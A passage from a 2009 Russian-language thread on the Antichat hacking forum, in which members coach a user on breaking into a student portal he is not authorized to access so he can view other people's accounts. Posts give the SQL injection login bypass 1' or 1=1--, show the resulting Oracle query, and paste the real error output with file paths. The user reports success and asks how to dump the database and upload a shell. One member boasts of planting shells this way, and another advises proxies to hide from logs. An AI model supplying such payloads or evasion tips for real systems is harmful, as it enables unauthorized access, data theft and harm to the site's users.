ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 09.08.2009, 11:29
Raz0rnsk
Новичок
Регистрация: 14.07.2009
Сообщений: 6
Провел на форуме:
79391

Репутация: 0
По умолчанию

Цитата:
Сообщение от jokester  
Предложу заюзать скуль в авторизации

' or 1=1--

Ну а если что-то непонятно, то почитать статьи
шутку не оценил, насчет почитать статьи это и сам знаю, я спрашивал конкретно, в связи с типом сервера и тд

а свой лог/пасс у меня есть, мне надо чужие просмотреть

Последний раз редактировалось Raz0rnsk; 09.08.2009 в 11:32..
 
Ответить с цитированием

  #12  
Старый 09.08.2009, 11:55
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Ну вообще-то я не шутил, там скуль в авторизации войти можно вставив в поле логин значение
1' or 1=1-- а поле пароль любое.

А статьи я рекомендовал почитать, если непонятно, что именно я тебе посоветовал. И если ты всё-же последуешь моему совету и сделаешь это, то возможно поймёшь как можно зайти под ЛЮБЫМ пользователем.

FireFenix

Вы тут что, издеваетесь что-ли все? Я для кого это писал вообще?
 
Ответить с цитированием

  #13  
Старый 09.08.2009, 12:51
fraIzer
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551

Репутация: 13
По умолчанию

Цитата:
Сообщение от Raz0rnsk  
шутку не оценил, насчет почитать статьи это и сам знаю, я спрашивал конкретно, в связи с типом сервера и тд

а свой лог/пасс у меня есть, мне надо чужие просмотреть
Кроме шуток, чем тебя не устраивает классическая инъекция в where в поле авторизации?

Запрос у нас будет выглядеть примерно следующим образом:
Код:
SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936: missing expression]
 
Ответить с цитированием

  #14  
Старый 09.08.2009, 13:56
mr.gr33n
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317

Репутация: 209
Отправить сообщение для mr.gr33n с помощью ICQ
По умолчанию

Насчёт or 1=1, попадались пару сайтов сделаных в 2008 - 2009 годах,в админке проканал данный способ, залил шелл))
Мораль такова: надо пробывать все возможные способы, ну для начало почитать статьи которых на ачате полно, а потом задавать вопросы)
 
Ответить с цитированием

  #15  
Старый 09.08.2009, 14:11
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Джокстер просто неумеет хакерствовать с хспайдером вот и завидует
 
Ответить с цитированием

  #16  
Старый 09.08.2009, 19:03
Raz0rnsk
Новичок
Регистрация: 14.07.2009
Сообщений: 6
Провел на форуме:
79391

Репутация: 0
По умолчанию

Цитата:
Сообщение от jokester  
Ну вообще-то я не шутил, там скуль в авторизации войти можно вставив в поле логин значение
1' or 1=1-- а поле пароль любое.

А статьи я рекомендовал почитать, если непонятно, что именно я тебе посоветовал. И если ты всё-же последуешь моему совету и сделаешь это, то возможно поймёшь как можно зайти под ЛЮБЫМ пользователем.

FireFenix

Вы тут что, издеваетесь что-ли все? Я для кого это писал вообще?
сори, что погорячился.
получилось
но я вообще хотел, зная вид(по своим данным), заходить под конкретным пользователем, может базу как-то слить?
а раз проканывает заходить под 1' or 1=1--, шелл получится залить?
 
Ответить с цитированием

  #17  
Старый 09.08.2009, 19:17
Raz0rnsk
Новичок
Регистрация: 14.07.2009
Сообщений: 6
Провел на форуме:
79391

Репутация: 0
По умолчанию

Цитата:
Сообщение от fraIzer  
Кроме шуток, чем тебя не устраивает классическая инъекция в where в поле авторизации?

Запрос у нас будет выглядеть примерно следующим образом:
Код:
SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936: missing expression]
ввел в логин

получил

К сожалению, в настоящий момент продолжение работы невозможно. Примите извинения за доставленные неудобства.
ошибка при попытке авторизации студента
ошибка БД: SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936' and t.SPASSWORD='9862C0CBF9702F2883680ACFFE8768DD' and t.idstudent is not NULL [nativecode=ORA-01756: quoted string not properly terminated]
файл: /www/web/sites/student_study/index.php:55
 
Ответить с цитированием

  #18  
Старый 09.08.2009, 20:08
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

еммм ты хотяб предохраняешься?)
юзай http://hidemyass.com/ или proxya.ru
а то логи-то сохраняются))смотри свои данные не пиши)
 
Ответить с цитированием

  #19  
Старый 09.08.2009, 20:32
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

ТС, https://forum.antichat.ru/thread40576.html
пока 4 раза не перечитаешь эту статью, больше сюда не пиши
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
как обойти действия тега [HIDE][/HIDE] на форуме vBulletin Doom123 Форумы 30 18.12.2009 00:59
как обойти спам фильтр на yahoo stalles E-Mail 2 11.05.2009 19:40
Обойти фильтрацию! Utochka Уязвимости 6 02.02.2006 11:33
Как обойти сканер со значком ' Thief Форумы 2 21.04.2005 12:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ